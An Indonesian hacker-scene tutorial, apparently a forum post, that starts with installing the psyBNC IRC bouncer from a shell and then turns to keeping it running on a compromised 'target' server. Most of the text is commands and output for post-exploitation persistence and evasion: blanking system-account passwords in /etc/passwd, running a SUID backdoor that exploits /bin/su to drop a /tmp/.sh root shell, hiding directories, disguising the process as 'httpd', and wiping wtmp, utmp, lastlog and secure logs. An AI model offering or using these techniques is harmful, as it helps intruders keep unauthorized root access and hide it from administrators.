Info buat On3 :

 

Cara Penginstallan psyBNC untuk IRC.

Karena banyak request dari chatter irc menanyakan bagaimana cara setting psyBNC disini saya akan menjelaskan cara penginstallan psyBNC dari shell ke irc.

Langkah pertama yang harus di lakukan.
1. login shell anda dalam ftp/telnet/putty.
2. apabila anda sudah login shell silahkan ketik ls -al. disana akan terdapat untuk access ../root.
3. yang udah memiliki tutorial psybnc diharapkan tidak melakukan install tutorial pada bagian nomer 4, silahkan lanjut langsung ke nomer 5.
4. untuk install tutorial psybnc ketik wget "www.psychoid.net/psyBNC2.3.2-4.tar.gz" or anda bisa cari tutorial psyBNC sendiri.
5. sudah dapat wget? lakukan kembali ketik "tar xzvf psyBNC.tar.gz" untuk mendapatkan install dari bagian psyBNC.

6. langkah berikutnya ketik "make" agar semuanya diyakinkan sudah terinstall.
7. ketik "cd psybnc"
8. ketik "pico psybnc.conf" or "vi psybnc.conf" didalam pico or vi tersebut silahkan anda edit untuk "address" dan "port". lain dari itu jgn di ganti !! udah abis edit silahkan keluar dari pico or vi. ndak tau cara keluar dari comment vi ? hehehe...pencet "esc" terus ":" pencet lagi "Q" baruuu "enter" nah looo dah keluar ya ? :)
9. well, skrg liat kembali hasil installan anda. ketik "ls -al" check semua keseluruhan install psyBNC. biasanya disana terdapat 146 komponen bagian psyBNC. apabila benar maka anda sudah menginstall keseluruhan bagian psyBNC tersebut.
10. cara terakhir ketik "./psybnc"

NaH? skrg semua sudah bisa di jalankan. sebelum connect ke irc ingat server dan port yg telah anda masukkan pada waktu di pico or vi tadi, Ok?

sekarang anda boleh buka IRC anda. masukkan nickname yang ingin di gunakan kemudian ingattt ident yg ingin di pakai. biasanya shell yg sudah di restrict dari admin ident tidak bisa bebas. ident yg di gunakan biasanya dari user login shell yg anda pakai !! kemudian langkah selanjutnya masukkan server dan port yg sebelumnya anda buat tadi pada saat install psybnc.
contoh : /server 202.111.111.11:31337
so, masukin password anda. gunakan cara "/quote pass password.

nah skrg psyBNC anda sudah terconnect dalam irc. anda boleh cari gbtan sepuas-puasnya hehehehehe...
udah ah cape jelasin mending gbtan lagi ;p

Kecerobohan Yang Sering Dilakukan.

Ok. diatas saya sudah menjelaskan cara penginstallan psyBNC.
HmmMm...skrg saya akan membeberkan beberapa kecerobohan yang sering kita lakukan ketika kita memasang PSYBNC di server target :

Menjalankan PSYBNC dengan login user yang kita add di shell target.

Ini adalah kecerobohan yang paling fatal yang seringkali kita lakukan. Kalau saya menjadi seorang Admin ketika saya akan mengecek system maka yang akan saya cek pertama kali adalah file /etc/passwd karena di file tersebutlah terdapat seluruh nama user yang bisa login ke system. Ketika saya menemukan ada nama user yang berbeda dengan nama user yang ada di file /etc/passwd yang sebelumnya saya backup maka bisa di pastikan bahwa ada user illegal yang baru saja masuk ke dalam system. Dan ketika saya menemukan kejanggalan ini maka saya akan langsung menghapus home direktori dari user tersebut dengan recursife mode yang berarti seluruh folder beserta isinya akan di hapus tanpa kompromi. Bisa di pastikan juga bahwa file PSYBNC Anda yang di simpan di folder tersebut akan ikut terhapus.

file yang asli.

 

.

nscd:x:28:28:NSCD Daemon:/:/bin/false

ident:x:98:98:pident user:/:/sbin/nologin

radvd:x:75:75:radvd user:/:/bin/false

xnuxer:x:500:500::/home/xnuxer:/bin/bash

 

isi file /etc/passwd yang telah termodifikasi.

 

.

nscd:x:28:28:NSCD Daemon:/:/bin/false

ident:x:98:98:pident user:/:/sbin/nologin

radvd:x:75:75:radvd user:/:/bin/false

xnuxer:x:500:500::/home/xnuxer:/bin/bash

anto:x:76:75::/etc/.anto:/bin/bash ß dari sini si Admin bisa menebak

 

 

Menyimpan file PSYBNC di folder yang tidak tersembunyi.

Bila kita melihat contoh kasus di point pertama di atas Anda seharusnya menyembunyikan folder psybnc dan merubah nama folder dengan nama lain sehingga ketika si Admin mengecek folder user dengan menggunakan command ls maka file Anda tidak akan terlihat.

 

Menjalankan PSYBNC dengan menggunakan nama file PSYBNC atau file konfig yang tidak di rename nama filenya.

Ketika si Admin sudah mencurigai bahwa systemnya telah di masuki orang lain maka bisa di pastikan si Admin akan mengecek file-file yang running di system dengan menggunakan perintah ps ax dan si Admin melihat ada process system yang menggunakan nama PSYBNC maka bisa di pastikan si Admin akan langsung menjalankan perintah killall psybnc dan semua file yang di run dengan nama tersebut langsung mati.

 

1058 tty3 S 0:00 /sbin/mingetty tty3

1059 tty4 S 0:00 /sbin/mingetty tty4

1060 tty5 S 0:00 /sbin/mingetty tty5

1061 tty6 S 0:00 /sbin/mingetty tty6

1064 tty1 S 0:00 -bash

1103 tty2 R 0:00 ./psybnc psybnc.conf

1124 tty1 R 0:00 ps -ax

 

 

Jadi gimana caranya ? Saya akan memberikan trik yang aman yang bisa Anda coba dan Anda kembangkan sendiri. Dengan melihat tiga kasus di atas maka ada beberapa cara untuk mengatasinya.

 

- Jangan membuat user login ke dalam file /etc/passwd ketika Anda mendapatkan akses root dengan menggunakan eksploit tapi manfaatkan user yang sudah ada di file tersebut dan user tersebut di pakai oleh system dengan menggunakan shell bash atau sh. Misalnya seperti: news, mysql, postgres, etc. Anda bisa memilih beberapa user system yang bisa di manfaatkan, kemudian hapus password dari user tersebut dengan menggunakan perintah passwd d [nama user] sehingga ketika Anda login dengan menggunakan nama user tersebut, password tidak akan di minta oleh system. Jika Anda login dengan menggunakan SSH yang sudah jalan di system hal ini tidak berlaku dan Anda tetap akan di mintai password kecuali jika Anda bisa mengakali SSH target dengan menggunakan beberapa trik (hehehe. ).

 

contoh user yang bisa di pakai

 

rpm:x:37:37::/var/lib/rpm:/bin/bash

 

menghapus password rpm

 

sh-2.05# passwd -d rpm

Changing password for user rpm

Removing password for user rpm

passwd: Success

 

 

setelah password di hapus

 

bash$ su rpm

[rpm@serv /var/lib/rpm]$

 

 

- Jalankan beberapa backdoor di system yang bisa memberikan akses root tanpa harus merubah file /etc/passwd seperti di bawah ini:

 

bash# ./sux

Backdoor SUID by Schizoprenic. Xnuxer Research Center, 2002

Private Only!, Don't Distributed...!

 

Step 1 - Checking paths and write permisions

Checking write permisions on /tmp...Ok

Checking read permisions on /bin/su...Ok

Checking that /tmp/LC_MESSAGES does not exist...Ok

Step 2 - Creating evil libc.mo and setting enviroment vars

Step 3 - Getting address of .dtors section of /bin/su

..........................................done

.dtors is at 0x0804cd4c

Step 4 - Compiling suid shell

/tmp/.sh created Ok

Step 5 - Executing /bin/su

Step 6 - Set permission file...

Step 7 - Successfull...!

Run root shell with type /tmp/.sh, Enjoy bro ;P ...!

 

bash# exit

bash$ /tmp/.sh

sh-2.05# id

uid=0(root) gid=0(root) groups=500(xnuxer)

 

 

 

- Buat nama direktori tersembunyi dengan menggunkan akses root di lokasi yang sering di pakai oleh system seperti di direktori /etc, /var, dsb dengan menggunakan karakter . (titik) di depan direktori yang akan kita buat ( .sh ). Caranya adalah sbb:

 

bash# mkdir /var/log/ ß Ini dia direktori yang tersembunyi hehehe.

bash# chmod 700 /var/log/

bash# chown xnuxer:xnuxer /var/log/

 

xnuxer adalah nama user yang sudah ada di /etc/passwd (tanpa merubah file tersebut) yang nanti akan di gunakan untuk menjalankan file psybnc.

 

- Gunakan nama user yang ada di file /etc/passwd yang bukan milik system untuk menjalankan file psybnc Anda dengan cara menghilangkan karakter x setelah nama user. Jangan menggunakan perintah passwd d [nama user] untuk menghilangkan password user tersebut karena hal ini akan mengakibatkan kecurigaan user yang login dengan name login yang kita pakai ketika dia login dan tidak di mintakan password oleh system. Dengan menambahkan kembali karakter x di user name yang kita hapus karakter x nya, hal ini akan mengembalikan password user tersebut tanpa perlu proses yang rumit.

 

sebelum karakter x di hapus

 

xnuxer:x:500:500::/home/xnuxer:/bin/bash

 

sesudah karakter x di hapus

 

xnuxer::500:500::/home/xnuxer:/bin/bash

 

login dengan user yang karakter x sudah di hapus

 

bash$ su xnuxer

[xnuxer@serv /home/xnuxer]$

 

mengembalikan karakter x yang di hapus

 

xnuxer:x:500:500::/home/xnuxer:/bin/bash

 

login dengan user yang karakter x sudah di tulis kembali

 

bash$ su xnuxer

password:

 

 

- Setelah Anda menghapusk karakter x di /etc/passwd dengan menggunakan akses root selanjutnya login dengan nama user tersebut. Kemudian masukalh ke direktori tersembunyi yang telah kita buat seperti contoh di atas.

 

bash$ cd /var/log/

 

simpan file psybnc Anda di direktori ini dan rename file psybnc Anda dengan nama lain misalnya atau .sh

 

bash$ mv psybnc

 

ganti juga nama konfig psybnc dengan nama yang tidak di curigai

 

bash$ mv psybnc.conf httpd

 

jalankan psybnc.

 

bash$ ./ httpd

 

.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.

,----.,----.,-. ,-.,---.,--. ,-.,----.

| O || ,-' / / | o || | || ,--'

| _/ _ / | o< | | || |__

|_| |____/ |__| |___||_| _| ___|

Version 2.3 (c) 1999-2001

the most psychoid

and the cool lam3rz Group IRCnet

 

Configuration File: httpd

Language File: psyBNC Language File - English

No logfile specified, logging to log/psybnc.log

Listening on: 0.0.0.0 port 3456

psyBNC2.3-cBtITLdDMSNp started (PID 379185)

 

 

so? hehehehe... sekarang Anda bisa memakai psybnc Anda.. dan ketika si Admin menjalankan perintah ps ax maka akan terlihat proses seperti di bawah ini:

 

1060 tty5 S 0:00 /sbin/mingetty tty5

1061 tty6 S 0:00 /sbin/mingetty tty6

1064 tty1 S 0:00 bash

1132 tty2 R 0:00 ./ httpd

1136 tty1 R 0:00 ps -ax

 

 

- Keluarlah dari user login yang Anda pakai, kemudian dengan akses root tambahkan kembali karakter x di user name yang Anda pakai tadi untuk mengembalikan password user yang Anda pakai.

 

mengembalikan karakter x yang di hapus

 

xnuxer:x:500:500::/home/xnuxer:/bin/bash

 

login dengan user yang karakter x sudah di tulis kembali

 

bash$ su xnuxer

password:

 

 

Demikian cara yang saya tawarkan kepada Anda yang bisa menjadikan pilihan bagi Anda untuk memperpanjang umur psybnc. Saya sarankan juga agar Anda menghapus log yang ada di system baik dengan program Log Remover atau program penghapus log yang lain.

 

sh-2.05# ./rem postgres

Log Remover by Schizoprenic, Xnuxer Research Center, 2002

 

Step 1 - Check log...

Found 2 record(s) for user postgres

Step 2 - Cleaning Up....

Cleaning up 2 record(s) from /var/log/wtmp ... OK

Cleaning up 2 record(s) from /var/run/utmp ... OK

Cleaning up /var/log/lastlog ... OK

Cleaning up /var/log/messages ... OK

Cleaning up /var/log/secure ... OK

Cleaning up /var/log/maillog ... OK

Step 3 - Successfull Cleaning up...

 

 

Sekian trik dari saya, jika Anda ingin maju belajarlah untuk kreatif dan kuasai system Anda bukan system yang membuat Anda terkuasai, pelajari system so, Anda akan menemukan jawaban dari apa yang Anda cari selama ini.